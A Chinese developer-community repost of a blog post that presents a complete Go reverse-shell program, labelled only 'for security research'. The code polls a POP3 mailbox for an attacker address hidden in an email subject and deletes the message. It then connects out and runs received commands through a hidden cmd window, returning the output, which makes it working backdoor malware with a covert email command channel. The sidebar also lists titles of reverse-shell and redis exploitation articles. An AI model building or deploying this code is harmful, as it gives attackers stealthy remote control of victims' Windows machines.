备案控制台
开发者社区 开发与运维 文章 正文

golang写的反弹shell(自作孽不可活,切记,切记!)

2017-10-23 2359
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 版权声明:本文可能为博主原创文章,若标明出处可随便转载。 https://blog.
版权声明:本文可能为博主原创文章,若标明出处可随便转载。 https://blog.csdn.net/Jailman/article/details/78321872

仅作安全研究

package main
import (
    "os/exec"
    "go-pop3"
    "log"
    "strings"
    "net"
    // "fmt"
    "syscall"
    "bufio"
    "time"
)

//反弹shell函数
func reverseshell(addr string){

    if c,_:=net.Dial("tcp", addr); c != nil {
        for{
            status, _ := bufio.NewReader(c).ReadString('\n');
            //显示输入命令
            // fmt.Println(status)
            //输入exit命令退出
            if status == "exit\n" {
                break
            }
            //输入Ctrl+C时字符为空退出
            if status == "" {
                break
            }
            //执行命令返回结果
            cmd := exec.Command("cmd", "/C", status)
            cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
            out, _ := cmd.Output();
            c.Write([]byte(out))
        }
    }
}

//获取Email中的地址并调用反弹shell函数
func Get_Address_to_Rverse_shell(username string, password string){

    client, err := pop3.Dial("pop.sina.com:110")

    if err != nil {
        log.Fatalf("Error: %v\n", err)
    }

    defer func() {
        client.Quit()
        client.Close()
    }()

    if err = client.User(username); err != nil {
        log.Printf("Error: %v\n", err)
        return
    }

    if err = client.Pass(password); err != nil {
        log.Printf("Error: %v\n", err)
        return
    }

    var count int
    var size uint64

    if count, size, err = client.Stat(); err != nil {
        log.Printf("Error: %v\n", err)
        return
    }

    log.Printf("Count: %d, Size: %d\n", count, size)

    var content string

    if content, err = client.Retr(count); err != nil {
        log.Printf("Error: %v\n", err)
        return
    }

    if err = client.Dele(count); err != nil {
        log.Printf("Error: %v\n", err)
        return
    }

    if err = client.Noop(); err != nil {
        log.Printf("Error: %v\n", err)
        return
    }

    if err = client.Rset(); err != nil {
        log.Printf("Error: %v\n", err)
        return
    }

    //处理邮件object,获取地址
    list := strings.Split(content, "\r\n")
    for i := 0; i < len(list); i++ {
        line := list[i]
        if strings.Contains(line, "Subject:"){
            addrlist := strings.Split(line, ":")
            if len(addrlist) == 3 {
                temp_addr := addrlist[1] + ":" + addrlist[2]
                ADDR := strings.Replace(temp_addr, " ", "", -1)
                reverseshell(ADDR)
                // go reverseshell(ADDR)
            }
        }
    }
}


func main(){
    
    username := "xxx"
    password := "xxx"
    for{
        Get_Address_to_Rverse_shell(username, password)
        time.Sleep(10 * time.Second)
    }

}



文章标签:
Shell
Go
关键词:
Shell反弹
Golang shell
神棍儿
目录
相关文章
lady_killer9
|
5月前
|
监控 网络协议 Unix
Linux命令-nc(端口监控、文件传输、反弹shell等)
Linux命令-nc(端口监控、文件传输、反弹shell等)
lady_killer9
130 0
iewpzppxbbjsw
|
安全 NoSQL 关系型数据库
网络安全——利用ssrf操作内网redis写入计划任务反弹shell
今天的内容是ssrf漏洞的利用,环境选择的是discuz含有ssrf漏洞的版本,通过该漏洞来写入redis计划任务反弹shell,直接看操作
iewpzppxbbjsw
474 0
网络安全——利用ssrf操作内网redis写入计划任务反弹shell
iewpzppxbbjsw
|
NoSQL 安全 网络协议
网络安全——redis未授权访问漏洞写入计划任务反弹shell
redis未授权访问漏洞的深入利用
iewpzppxbbjsw
973 0
网络安全——redis未授权访问漏洞写入计划任务反弹shell
落寞的鱼
|
7月前
|
Shell
反弹shell脚本(php-reverse-shell)
反弹shell脚本(php-reverse-shell)
落寞的鱼
122 0
二进制怪兽
|
7月前
|
安全 网络协议 Shell
[笔记]Windows安全之《一》反弹Shell
[笔记]Windows安全之《一》反弹Shell
二进制怪兽
46 0
二进制怪兽
|
网络协议 安全 Shell
[笔记]Windows安全之《一》反弹Shell
Windows安全之《一》反弹Shell
二进制怪兽
701 0
[笔记]Windows安全之《一》反弹Shell
panda墨森
|
12月前
|
安全 Shell Linux
使用OpenSsl加密反弹shell
当我们使用nc等工具进行反弹shell时,流量都是没经过加密,直接传输的,管理员很容易就能发现我们的异常流量
panda墨森
204 0
随风kali
|
12月前
|
网络协议 Shell 网络安全
利用icmpsh建立icmp隧道反弹shell
利用icmpsh建立icmp隧道反弹shell
随风kali
91 0
乌鸦安全
|
12月前
|
Shell 数据库连接 数据库
宝塔后渗透-添加用户|反弹shell
宝塔后渗透-添加用户|反弹shell
乌鸦安全
257 0
ckcsec
|
网络协议 JavaScript Java
反弹shell备忘录
常用的一些反弹shell命令备忘录
ckcsec
313 0

热门文章

最新文章

  • 1
    开发语言详解(python、java、Go(Golong)。。。。)
  • 2
    《Go 简易速速上手小册》第10章:微服务与云原生应用(2024 最新版)(下)
  • 3
    《Go 简易速速上手小册》第1章:Go 语言基础(2024 最新版)(上)
  • 4
    掌握Go语言:Go语言中的字典魔法,高效数据检索与应用实例解析(18)
  • 5
    Sublime Text 3配置Go语言开发环境
  • 6
    《Go 简易速速上手小册》第6章:错误处理和测试(2024 最新版)(上)
  • 7
    推荐一款go语言的开源物联网框架-opengw
  • 8
    《Go 简易速速上手小册》第10章:微服务与云原生应用(2024 最新版)(上)
  • 9
    掌握Go语言:精通Go语言范围(range),高级应用及进销存系统实战(25)
  • 10
    掌握Go语言:Go语言通道,并发编程的利器与应用实例(20)
  • 1
    Go语言GC(垃圾回收)的工作原理
    38
  • 2
    Go语言协程泄漏(Goroutine Leak):原因和解决方案
    79
  • 3
    Go面向对象是如何实现的?
    33
  • 4
    Go中的GMP状态详解
    37
  • 5
    Go语言在数据加密与保护中的应用
    216
  • 6
    Go语言在网络安全中的应用
    35
  • 7
    Go语言中的异常处理
    20
  • 8
    Rune类型详解:探究Go语言中的Unicode编码
    37
  • 9
    Go语言中defer的执行顺序详解
    29
  • 10
    Go语言与Docker容器结合的实践应用与案例分析
    21

    • 相关课程

    更多
  • Linux Shell 编程
  • Shell 脚本进阶
  • Shell 脚本入门
  • Linux Shell 编程入门与实战
  • Shell 编程入门到精通

    • 相关电子书

    更多
  • 阿里开发者手册-Golang专题
  • Shell 脚本速查手册
  • Golang 微服务在腾讯游戏用户运营领域的探索及实践

    • 相关实验场景

    更多
  • Alibaba Cloud Linux操作系统Shell程序
  • Linux指令入门-文件与权限

    • 推荐镜像

    更多
  • golang
  • nodejs-release
  • pypi
    • 下一篇
    部署LAMP环境(Alibaba Cloud Linux 3)